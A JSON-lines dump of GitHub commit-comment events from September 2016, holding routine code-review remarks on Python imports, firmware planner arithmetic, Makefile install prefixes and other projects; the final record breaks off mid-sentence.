{"id":"4515491719","type":"CommitCommentEvent","actor":{"login":"Hyssop56"},"repo":{"name":"brillout/awesome-react-components"},"payload":{"comment":{"id":18896735,"position":null,"line":null,"path":null,"commit_id":"5065357fa01c7d68d87cc0bd21b39ce446e6a482","created_at":"2016-09-05T07:36:35Z","updated_at":"2016-09-05T07:36:35Z","body":"learning about this"}},"created_at":"2016-09-05T07:36:35Z"}
{"id":"4515492041","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18896737,"position":null,"line":null,"path":null,"commit_id":"e1409a5e3828397b06ad9c232f4b9849dab9ca43","created_at":"2016-09-05T07:36:42Z","updated_at":"2016-09-05T07:36:42Z","body":"@doomsayer2 ehat is a comsetical bug ? 😄"}},"created_at":"2016-09-05T07:36:42Z"}
{"id":"4515493027","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896740,"position":2,"line":2,"path":"src/Address.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:37:01Z","updated_at":"2016-09-05T07:37:01Z","body":"can also keep \r\nprivate User user;"}},"created_at":"2016-09-05T07:37:01Z"}
{"id":"4515493123","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/SpamPAD"},"payload":{"comment":{"id":18896741,"position":6,"line":6,"path":"pad/plugins/spam_cop.py","commit_id":"2dfa2cd44a48f219c8a3bf32b203077c630088f8","created_at":"2016-09-05T07:37:02Z","updated_at":"2016-09-05T07:37:02Z","body":"@catalinaghiorghita\r\n\r\nNot necessarily a problem but we generally organize the imports by length e.g. we first do import `re` and the `sys` and then `time` and so on. \r\n\r\nHowever we do always split the standard library from third-party libraries. Here `dns.resolver` should be in a separate block. However :) you don't need to use the dns.resolved module as we have our own wrapper around it. This is already set in the context, so you can just do:\r\n\r\n```\r\nself.ctxt.dns.query(...)\r\n```\r\n\r\nSee `dns_eval.py` plugin for example, and `pad/dns_interface.py` where the dns resolver is already defined. We need to have all of our modules using the same dns interface/resolver because the user can set custom settings, such as timeouts and custom nameservers, and those need to apply to ALL dns queries. "}},"created_at":"2016-09-05T07:37:02Z"}
{"id":"4515493611","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18896742,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-05T07:37:11Z","updated_at":"2016-09-05T07:37:11Z","body":"Hi. I don't quite understand but is there a reason that you are sticking to Vista? Why not update to Win7 at least? I gave up Vista because it needs to build extra binaries and Npcap has enough different versions of binaries. When the new WiFi support is done, the binary numbers will be even doubled."}},"created_at":"2016-09-05T07:37:11Z"}
{"id":"4515494230","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896744,"position":123,"line":97,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"c43880bb8cba8c10e870c312e5a13f2596200e8f","created_at":"2016-09-05T07:37:21Z","updated_at":"2016-09-05T07:37:21Z","body":"You're expecting that there should be an error right? If there is, this will call `done(some object)` and the test will fail."}},"created_at":"2016-09-05T07:37:21Z"}
{"id":"4515494786","type":"CommitCommentEvent","actor":{"login":"Robijnvogel"},"repo":{"name":"Thaumic-Tinkerer/ThaumicTinkerer"},"payload":{"comment":{"id":18896746,"position":null,"line":null,"path":null,"commit_id":"95b5a78b601843b751bf9b596dfaf140fd9fc262","created_at":"2016-09-05T07:37:31Z","updated_at":"2016-09-05T07:37:31Z","body":"1735 -> 1738\r\nWhy? They are both not the recommended and not the latest Forge version.\r\nI like to learn from the best."}},"created_at":"2016-09-05T07:37:31Z"}
{"id":"4515496851","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/SpamPAD"},"payload":{"comment":{"id":18896755,"position":93,"line":93,"path":"pad/plugins/spam_cop.py","commit_id":"2dfa2cd44a48f219c8a3bf32b203077c630088f8","created_at":"2016-09-05T07:38:10Z","updated_at":"2016-09-05T07:38:10Z","body":"Here you can use `email.utils.formatdate()` to generate this string. "}},"created_at":"2016-09-05T07:38:10Z"}
{"id":"4515497277","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18896756,"position":null,"line":null,"path":null,"commit_id":"1ba6af016889aa001a0cacc2ef9135631fd02920","created_at":"2016-09-05T07:38:18Z","updated_at":"2016-09-05T07:38:18Z","body":"I've tested it both on my hardware and in vbox with the latest ISO. Works for me. The version in the repo is still the version with empty quotes. But that one works equally for me."}},"created_at":"2016-09-05T07:38:18Z"}
{"id":"4515497447","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/AddressBookArchitecture"},"payload":{"comment":{"id":18896757,"position":10,"line":10,"path":"src/Controller.java","commit_id":"21dc1103741e48b4fc1e0ff40497f372a5d0ecd3","created_at":"2016-09-05T07:38:20Z","updated_at":"2016-09-05T07:38:20Z","body":"will be good if you use relative paths or read the full path through main method argumetn (e.g. args[0], args[1])"}},"created_at":"2016-09-05T07:38:20Z"}
{"id":"4515497571","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896758,"position":null,"line":null,"path":null,"commit_id":"60911fe235917b9c8505583598a427ff5f1a4b38","created_at":"2016-09-05T07:38:22Z","updated_at":"2016-09-05T07:38:22Z","body":"This check-in is preparing for potential changes using Intel CPU support for large integers. Also see the [New Instructions Supporting Large Integer Arithmetic on Intel Architecture Processors](https://www-ssl.intel.com/content/dam/www/public/us/en/documents/white-papers/ia-large-integer-arithmetic-paper.pdf) white paper."}},"created_at":"2016-09-05T07:38:22Z"}
{"id":"4515497821","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18896759,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-05T07:38:27Z","updated_at":"2016-09-05T07:38:27Z","body":"Cool, thanks"}},"created_at":"2016-09-05T07:38:27Z"}
{"id":"4515498054","type":"CommitCommentEvent","actor":{"login":"FrenchBen"},"repo":{"name":"Fahrradflucht/kitematic"},"payload":{"comment":{"id":18896760,"position":4,"line":24,"path":"package.json","commit_id":"317180e0cc2a98b0307f2e96ecc2c4a900d46211","created_at":"2016-09-05T07:38:31Z","updated_at":"2016-09-05T07:38:31Z","body":"We have `4.2.2` in Travis - Could this be made to match?"}},"created_at":"2016-09-05T07:38:31Z"}
{"id":"4515498566","type":"CommitCommentEvent","actor":{"login":"pavel-odintsov"},"repo":{"name":"LTD-Beget/fastnetmon"},"payload":{"comment":{"id":18896763,"position":null,"line":null,"path":null,"commit_id":"7223e806965d4bf8d3cc6bfb8c799e4327520b51","created_at":"2016-09-05T07:38:40Z","updated_at":"2016-09-05T07:38:40Z","body":"It's actually not a good idea if you want to have support from project's upstream. Key reasons for \"custom compiled\" libraries was really HUGE number of supported OS and distributions. All of them has different library versions and I do not want to maintain this library hell.\r\n\r\nI'm relaying on features from new versions of libraries and in next minor version you could need compile libraries from sources again and again. "}},"created_at":"2016-09-05T07:38:40Z"}
{"id":"4515504654","type":"CommitCommentEvent","actor":{"login":"dferber90"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":18896781,"position":56,"line":56,"path":"src/types.js","commit_id":"0a0d752c5c94b9f5dfcd8e64531c6640a6153d97","created_at":"2016-09-05T07:40:23Z","updated_at":"2016-09-05T07:40:23Z","body":"I don't think we can specify them any further than this, can we?"}},"created_at":"2016-09-05T07:40:23Z"}
{"id":"4515504748","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18896782,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T07:40:23Z","updated_at":"2016-09-05T07:40:23Z","body":"Why not ?"}},"created_at":"2016-09-05T07:40:23Z"}
{"id":"4515505359","type":"CommitCommentEvent","actor":{"login":"gasyoun"},"repo":{"name":"funderburkjim/elispsanskrit"},"payload":{"comment":{"id":18896783,"position":null,"line":null,"path":null,"commit_id":"0c58e017fd8f260412ad6a238d116c8edaa1aa59","created_at":"2016-09-05T07:40:34Z","updated_at":"2016-09-05T07:40:34Z","body":"```\r\n-smaya!\r\n +syama!\r\n```\r\n\r\nSo that was an input error?"}},"created_at":"2016-09-05T07:40:34Z"}
{"id":"4515506145","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18896785,"position":null,"line":null,"path":null,"commit_id":"fea45591b219e91e68b4a588d004b27a3a8c629a","created_at":"2016-09-05T07:40:47Z","updated_at":"2016-09-05T07:40:47Z","body":"Also see [Commit cf81d8a09998a879: Add constexpr-ness to seckey.h classes](http://github.com/weidai11/cryptopp/commit/cf81d8a09998a879969e6096c68c068f971e9784). Changes to `secblock.h` and `seckey.h` are accounting for a 100ms to 150ms speedup in the self tests (`cryptest.exe v`) under GCC 4.8 at `-O2`."}},"created_at":"2016-09-05T07:40:47Z"}
{"id":"4515510518","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18896789,"position":103,"line":103,"path":"src/com/sopra/tienda/dominio/Producto.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-05T07:42:02Z","updated_at":"2016-09-05T07:42:02Z","body":"Normalmente, cando se traballa en grupo, establecese unhas estrategias de traballo (idioma, formato...) para evitar este tipo de diferencias.\r\nSe non existen estrategias, hai que reunirse e definilas ou adaptarse (adivinalas) ó codigo existente"}},"created_at":"2016-09-05T07:42:02Z"}
{"id":"4515510650","type":"CommitCommentEvent","actor":{"login":"bubnikv"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":18896790,"position":null,"line":null,"path":null,"commit_id":"e0bb76032c5ec682da1e0d58214cb02840a6593b","created_at":"2016-09-05T07:42:05Z","updated_at":"2016-09-05T07:42:05Z","body":"Dear Sonny.\r\n\r\n> I'd like to suggest that using integer calculations in the planner isn't a great idea. Grbl doesn't do this intentionally because you eliminate the risk of exceeding the integer max value and maintaining numeric precision throughout.\r\n\r\nI went thorough this piece of code I converted from floats to fixed point carefully and the modified code leads to precisely the same results as the floating point code, so there is absolutely no loss of precision. You are right that one may have issues with overflows if one moves to a significantly larger print bed or finer steps, but there are currently large reserves in the integer numbers used.\r\n\r\n> This precision issue can get you in trouble quickly and can be hard to debug.\r\n\r\nSure, you are perfectly right. I suppose at the time we will be using a more powerful computing platform, so we will not have these issues. But right now the change helps to thousands of our customers.\r\n\r\n> Sure you can perfectly tune everything for a machine or two, but this leads to making the code obsolete every time you alter something.\r\n\r\nRight, one has to be careful, but the firmware base is quite small and the time critical code is small as well. A reasonable approach is to test for the possible overflows by the means of static asserts (which I did not implement yet though).\r\n\r\n> Also, over sampling the Bresenham is a good idea. Grbl does it in the stepper algorithm as something called AMASS. One thing I learned from installing it is that you don't get much benefit going from 4x to 8x over sampling. It's a few percent improvement. So if you have performance issues, I'd look at reducing to 4x.\r\n\r\nThanks, that is good to know. Currently the oversampling is limited by the maximum allowed interrupt frequency, so the 8x oversampling is rarely active.\r\n\r\n>Lastly, in terms of the planner, Grbl has already improved its performance drastically to guarantee a new plan within 4ms. And computes parts of the plan that can changes. Meaning it typically computes only the latter third of the planner at any given time. You can recoup nearly all of the computational overhead by using floats if use it.\r\n\r\nThans, I will look into the updated GRBL when I get back to the firmware development. I am working on Slic3r as well, so I have to limit switching my context to be productive.\r\n\r\n> Just make sure to attribute my copyrights correctly. Marlin has always copied large parts of my Grbl code without proper attributions. Thanks.\r\n\r\nI surely will.\r\n\r\nI wonder how does your latest GRBL code compare to the TinyG firmware in regard to the smoothness of movements. I am considering to learn the proper S-curve path planning, but the Arduino hardware platform is quite a limit.\r\n\r\nThanks, Vojtech\r\n"}},"created_at":"2016-09-05T07:42:05Z"}
{"id":"4515512671","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18896794,"position":17,"line":17,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:42:42Z","updated_at":"2016-09-05T07:42:42Z","body":"Alright. I just had that in place as comments to myself. Forgot to remove them."}},"created_at":"2016-09-05T07:42:42Z"}
{"id":"4515512767","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18896795,"position":7,"line":7,"path":"src/com/sopra/tienda/util/MainValidator.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-05T07:42:44Z","updated_at":"2016-09-05T07:42:44Z","body":"Pois podes mover todo este código a unha clase de test unitario"}},"created_at":"2016-09-05T07:42:44Z"}
{"id":"4515513565","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18896797,"position":33,"line":33,"path":"pkg/providers/openstack/delete_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-05T07:42:57Z","updated_at":"2016-09-05T07:42:57Z","body":"Going for \"failed to...\" everywhere, thanks."}},"created_at":"2016-09-05T07:42:57Z"}
{"id":"4515513732","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18896798,"position":11,"line":11,"path":"test/com/sopra/tienda/dominio/CategoriaTest.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-05T07:43:00Z","updated_at":"2016-09-05T07:43:00Z","body":"Pois borraos"}},"created_at":"2016-09-05T07:43:00Z"}
{"id":"4515517340","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18896807,"position":17,"line":17,"path":"test/com/sopra/tienda/objetos/daos/testCategoriaDao.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-05T07:44:01Z","updated_at":"2016-09-05T07:44:01Z","body":"Ainda que non sexa código teu, se ves errores, podes (debes corregilos). Sempre e cando non che leve moito tempo, en tal caso reunirse para falalo e tratalo en \"urgencia\""}},"created_at":"2016-09-05T07:44:01Z"}
{"id":"4515519032","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/SpamPAD"},"payload":{"comment":{"id":18896809,"position":76,"line":76,"path":"pad/plugins/spam_cop.py","commit_id":"2dfa2cd44a48f219c8a3bf32b203077c630088f8","created_at":"2016-09-05T07:44:28Z","updated_at":"2016-09-05T07:44:28Z","body":"This function looks good, however there are easier ways to generate messages in Python. E.g. methods that don't involve settings boundaries and content-types manually. \r\n\r\nE.g. you can create a multipart message with and set any headers you want:\r\n\r\n```\r\nmsg = email.mime.multipart.MIMEMultipart(\"mixed\")\r\nmsg['Date'] = email.utils.formatdate()\r\n...\r\n```\r\n\r\nThen attach a text part to it:\r\n\r\n```\r\nmsg.attach(email.mime.text.MIMEText('I presume the \"description\" needs to be here'))\r\n```\r\n\r\nThen attach the original message:\r\n\r\n```\r\n    original_attachment = email.mime.base.MIMEBase(\"message\", \"rfc822\")\r\n    original_attachment.add_header(\"Content-Disposition\", \"inline\")\r\n    original_attachment.set_payload(msg.raw_msg) # You probably need to apply truncation as well before this\r\n    msg.attach(original_attachment)\r\n```\r\n\r\nThen convert the message to string and send it:\r\n\r\n```\r\nmsg.as_string()\r\n```"}},"created_at":"2016-09-05T07:44:28Z"}
{"id":"4515519124","type":"CommitCommentEvent","actor":{"login":"IcyVeteran"},"repo":{"name":"IcyVeteran/HelloWorld"},"payload":{"comment":{"id":18896811,"position":null,"line":null,"path":null,"commit_id":"63ce75325ef061cc65a9f103730ddafe2511abac","created_at":"2016-09-05T07:44:30Z","updated_at":"2016-09-05T07:44:30Z","body":"lallal"}},"created_at":"2016-09-05T07:44:30Z"}
{"id":"4515520138","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AnzhelikaKravchuk/.NET-Training"},"payload":{"comment":{"id":18896816,"position":null,"line":null,"path":null,"commit_id":"37103931c4bd9928b046bc572f9d3c035368a046","created_at":"2016-09-05T07:44:47Z","updated_at":"2016-09-05T07:44:47Z","body":"Delete old files\r\n"}},"created_at":"2016-09-05T07:44:47Z"}
{"id":"4515522102","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18896875,"position":null,"line":null,"path":null,"commit_id":"93656f5564b67296b7887a77a24e0504a47cfafe","created_at":"2016-09-05T07:45:23Z","updated_at":"2016-09-05T07:45:23Z","body":"Strictly speaking we should be _LGPL_, to line up with PocketMine."}},"created_at":"2016-09-05T07:45:23Z"}
{"id":"4515522413","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18896885,"position":9,"line":128,"path":"core/runtime.jvm/src/kotlin/jvm/internal/CallableReference.java","commit_id":"ecad306f42973f379a747e5ada12a515d868c12d","created_at":"2016-09-05T07:45:27Z","updated_at":"2016-09-05T07:45:27Z","body":"It still looks fragile to me, why is `reflected` field is not volatile?"}},"created_at":"2016-09-05T07:45:27Z"}
{"id":"4515525269","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18896966,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-05T07:46:14Z","updated_at":"2016-09-05T07:46:14Z","body":"@thebigsmileXD that's the main reason why I removed it (compatibility issues)"}},"created_at":"2016-09-05T07:46:14Z"}
{"id":"4515527309","type":"CommitCommentEvent","actor":{"login":"splendorbass"},"repo":{"name":"splendorbass/helloworld"},"payload":{"comment":{"id":18897020,"position":null,"line":null,"path":null,"commit_id":"3f47d107d99f55bb1a24b68eec92d52c32b2991c","created_at":"2016-09-05T07:46:46Z","updated_at":"2016-09-05T07:46:46Z","body":"복잡하군"}},"created_at":"2016-09-05T07:46:46Z"}
{"id":"4515534296","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18897053,"position":57,"line":57,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:48:43Z","updated_at":"2016-09-05T07:48:43Z","body":"Looks like this is being called `authoredAt` elsewhere, and it's usually an object that inherits from `Date`, so do `new Date(query.Date)`"}},"created_at":"2016-09-05T07:48:43Z"}
{"id":"4515534784","type":"CommitCommentEvent","actor":{"login":"adeii"},"repo":{"name":"AICP/packages_apps_LockClock"},"payload":{"comment":{"id":18897055,"position":null,"line":null,"path":null,"commit_id":"567cbc5958abf4e6940bfe97d9955ce60fb88933","created_at":"2016-09-05T07:48:51Z","updated_at":"2016-09-05T07:48:51Z","body":"I got 18 warnings about:\r\norg.apache.http.**\r\nandroid.webkit.WebView\r\nandroid.webkit.WebViewClient\r\nand also got: Error and waiting about unfinished jobs... so I've restore those \"dontwarn\"s and continue building."}},"created_at":"2016-09-05T07:48:51Z"}
{"id":"4515539650","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":18897063,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-05T07:50:18Z","updated_at":"2016-09-05T07:50:18Z","body":"Is it avalible for xt1079 ? For testing?"}},"created_at":"2016-09-05T07:50:18Z"}
{"id":"4515540698","type":"CommitCommentEvent","actor":{"login":"koradiavatsal"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":18897066,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-05T07:50:35Z","updated_at":"2016-09-05T07:50:35Z","body":"no"}},"created_at":"2016-09-05T07:50:35Z"}
{"id":"4515540825","type":"CommitCommentEvent","actor":{"login":"voron00"},"repo":{"name":"huncrys/libcod"},"payload":{"comment":{"id":18897067,"position":null,"line":null,"path":null,"commit_id":"f9a2921e03b39c44c054ad6d7f38b84700e3a9a8","created_at":"2016-09-05T07:50:36Z","updated_at":"2016-09-05T07:50:36Z","body":"But..but this stuff can be done via gsc ^^, whats the point adding them to an engine?"}},"created_at":"2016-09-05T07:50:36Z"}
{"id":"4515541431","type":"CommitCommentEvent","actor":{"login":"seisyuu"},"repo":{"name":"seisyuu/GitTestOikos"},"payload":{"comment":{"id":18897069,"position":null,"line":null,"path":null,"commit_id":"a0358fb09ab697078bd86a7940bdeb20523269b6","created_at":"2016-09-05T07:50:47Z","updated_at":"2016-09-05T07:50:47Z","body":"testtesttest"}},"created_at":"2016-09-05T07:50:47Z"}
{"id":"4515541712","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18897070,"position":28,"line":30,"path":"subprojects/docs/src/docs/release/notes.md","commit_id":"60bfd7dcce64d9a4e394148012e328ab365e0093","created_at":"2016-09-05T07:50:52Z","updated_at":"2016-09-05T07:50:52Z","body":"How about: \"They allow you to integrate independent Gradle builds, effectively giving you something like a multi-project build while keeping the builds separate. This is done by substituting project dependencies for binary dependencies at will.\" ?"}},"created_at":"2016-09-05T07:50:52Z"}
{"id":"4515542812","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18897071,"position":57,"line":57,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"6956515c4c911846c4de281e1b3389f3c4a96b1f","created_at":"2016-09-05T07:51:11Z","updated_at":"2016-09-05T07:51:11Z","body":"Oh, right. Will make that change."}},"created_at":"2016-09-05T07:51:11Z"}
{"id":"4515546438","type":"CommitCommentEvent","actor":{"login":"magemello"},"repo":{"name":"Alfresco/alfresco-ng2-components"},"payload":{"comment":{"id":18897074,"position":35,"line":41,"path":"ng2-components/ng2-alfresco-core/src/services/AlfrescoAuthentication.service.ts","commit_id":"5773b88ab4d690b1de827b04b13b5e4344436dd1","created_at":"2016-09-05T07:52:12Z","updated_at":"2016-09-05T07:52:12Z","body":"I suggest moving also this part in the AlfrescoApiService"}},"created_at":"2016-09-05T07:52:12Z"}
{"id":"4515547031","type":"CommitCommentEvent","actor":{"login":"axpence"},"repo":{"name":"gorried/pingpong"},"payload":{"comment":{"id":18897076,"position":114,"line":114,"path":"pingpong.py","commit_id":"01ced07c451e84124e505a3bdc73f855b9076235","created_at":"2016-09-05T07:52:20Z","updated_at":"2016-09-05T07:52:20Z","body":"This is good, but we should find a way to incentivize all above winners to continue game activity versus protecting one's rating. Otherwise whoever is king of the hill will nevah leave!! \r\n\r\nMaybe anytime a match is updated, everybody whose score is greater than max(winner_score, loser_score) gets an effective 20%  loss when compared with whoever won the match"}},"created_at":"2016-09-05T07:52:20Z"}
{"id":"4515549852","type":"CommitCommentEvent","actor":{"login":"dameert"},"repo":{"name":"theus77/elasticms"},"payload":{"comment":{"id":18897081,"position":null,"line":null,"path":null,"commit_id":"8fbd161259136ffb556a32db1bb846de4d71def5","created_at":"2016-09-05T07:53:10Z","updated_at":"2016-09-05T07:53:10Z","body":"through the \"div\" plugin, not \"diff\" as put in the commit message.."}},"created_at":"2016-09-05T07:53:10Z"}
{"id":"4515551358","type":"CommitCommentEvent","actor":{"login":"user-kuroda"},"repo":{"name":"user-kuroda/ToDoList2"},"payload":{"comment":{"id":18897086,"position":null,"line":null,"path":null,"commit_id":"282ed570e90397c0d086bd2ab7c5f39100721520","created_at":"2016-09-05T07:53:35Z","updated_at":"2016-09-05T07:53:35Z","body":"heroku push 完了\r\nhttps://young-river-66424.herokuapp.com/tasks"}},"created_at":"2016-09-05T07:53:35Z"}
{"id":"4515552703","type":"CommitCommentEvent","actor":{"login":"pierrechoffe"},"repo":{"name":"DOREMUS-ANR/doremus-ontology"},"payload":{"comment":{"id":18897088,"position":null,"line":null,"path":null,"commit_id":"31f3118f7ece3604716bf09441e75525782deb99","created_at":"2016-09-05T07:53:58Z","updated_at":"2016-09-05T07:53:58Z","body":"@rtroncy do you know why my protégé changed so many things?"}},"created_at":"2016-09-05T07:53:58Z"}
{"id":"4515553740","type":"CommitCommentEvent","actor":{"login":"phillord"},"repo":{"name":"cask/cask"},"payload":{"comment":{"id":18897091,"position":5,"line":685,"path":"cask.el","commit_id":"c85700d8fb3522cb3f26bc0c668c90dd451ecd5c","created_at":"2016-09-05T07:54:15Z","updated_at":"2016-09-05T07:54:15Z","body":"Am not planning on changing this. Am confused, though. Why are you using this directory in your `test/dotemacs.el`. If you let cask run the tests, then it would set the path for you correctly."}},"created_at":"2016-09-05T07:54:15Z"}
{"id":"4515553752","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18897092,"position":null,"line":null,"path":null,"commit_id":"b09edf25d04215bbcb18c57232a976a7e65e7f94","created_at":"2016-09-05T07:54:15Z","updated_at":"2016-09-05T07:54:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nGzSWZXA&#x2F;1972-bug-997051-doc-ruleset-should-start-at-0-and-increase-continuously\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 997051 - [doc] ruleset should start at 0 and increase continuously</a>"}},"created_at":"2016-09-05T07:54:15Z"}
{"id":"4515560725","type":"CommitCommentEvent","actor":{"login":"sumeng199"},"repo":{"name":"sumeng199/MyUtilsCollect"},"payload":{"comment":{"id":18897108,"position":24,"line":24,"path":"BitmapUtils.java","commit_id":"4f8da04af7b05801b5f0b9109bb59ce17c6ff13c","created_at":"2016-09-05T07:56:09Z","updated_at":"2016-09-05T07:56:09Z","body":"// tessetejskj"}},"created_at":"2016-09-05T07:56:09Z"}
{"id":"4515562877","type":"CommitCommentEvent","actor":{"login":"sumeng199"},"repo":{"name":"sumeng199/MyUtilsCollect"},"payload":{"comment":{"id":18897117,"position":24,"line":24,"path":"BitmapUtils.java","commit_id":"4f8da04af7b05801b5f0b9109bb59ce17c6ff13c","created_at":"2016-09-05T07:56:42Z","updated_at":"2016-09-05T07:56:42Z","body":"nummm"}},"created_at":"2016-09-05T07:56:42Z"}
{"id":"4515563494","type":"CommitCommentEvent","actor":{"login":"snamds"},"repo":{"name":"snamds/SickRage"},"payload":{"comment":{"id":18897119,"position":7,"line":348,"path":"sickbeard/common.py","commit_id":"196d0ebaddb2f501adc39a942acf9e50a38119ab","created_at":"2016-09-05T07:56:53Z","updated_at":"2016-09-05T07:56:53Z","body":"The problem is that \"ep.vres\" doesn't have a value. It doesn't get caught by the regex tag because doesn't have neither \"p\" nor \"i\".\r\nI could change the regex to match only \"720\" but I suppose this is a problem with a 720 episode (7 season, 20 episode)"}},"created_at":"2016-09-05T07:56:53Z"}
{"id":"4515563570","type":"CommitCommentEvent","actor":{"login":"bochecha"},"repo":{"name":"libretro/gambatte-libretro"},"payload":{"comment":{"id":18897120,"position":null,"line":null,"path":null,"commit_id":"24551644bee25534c12ccb6ddebd1e4266d727fe","created_at":"2016-09-05T07:56:54Z","updated_at":"2016-09-05T07:56:54Z","body":"> It's installing the *.so in /lib by default, bad place ihmo... it should be at /usr/lib/ instead, or /usr/local/lib/\r\n\r\nNo, it's installing into `$(prefix)/lib`.\r\n\r\nThis is the typical way things are always done, you let the user specify the `prefix` and then you install under that.\r\n\r\nWith autotools project, the `prefix` would be `/usr/local` by default. When building a distro (e.g rpms, I'm a Fedora contributor) then we set the `prefix` to `/usr`. When building with [flatpak](http://flatpak.org/), the `prefix` is set to `/app`.\r\n\r\nBut then a user could very well specify a different `prefix`, for example something under `/opt` or even under their `/home/username`.\r\n\r\nUsing `$(prefix)` rather than hardcoding `/usr` or `/usr/local` allows all of the above, and it is crucial.\r\n\r\nHowever, since `prefix` is not defined to a default value, it ends up being the empty string if a user doesn't specify it. I must admit I am so used to the rpm and flatpak worlds where `prefix` is always set to a proper value that I completely forgot that. This should be fixed.\r\n\r\n> A good location would be `$(DESTDIR)/usr/local/lib/libretro`\r\n\r\nOr rather, given what I wrote above, it would be `$(DESTDIR)$(prefix)/lib/libretro`\r\n\r\nYou really need to leave both `DESTDIR` and `prefix` as variables. This is useful for things like rpm or deb packages. During the build, these will create a build directory on the building machine and use that as `DESTDIR`. With rpm, this would be something like `$(pwd)/${pkgname}-${pkgversion}.${pkgarch}/`. Inside of it, they will install the stuff under the `prefix` (usually setting it to `/usr`). So by the end of the build, you'd have files like  `$(pwd)/${pkgname}-${pkgversion}.${pkgarch}/usr/bin/foobar`. Then rpm (deb works the same way) will pack all the contents of `$(pwd)/${pkgname}-${pkgversion}.${pkgarch}/` (aka `DESTDIR`) into an archive, re-rooting it to `DESTDIR`. This way the archive contains `/usr/bin/foobar`, and that's the file which gets installed when you install the rpm (or deb) package.\r\n\r\nAll that to say that maybe there are two things missing here:\r\n\r\n* define `prefix := 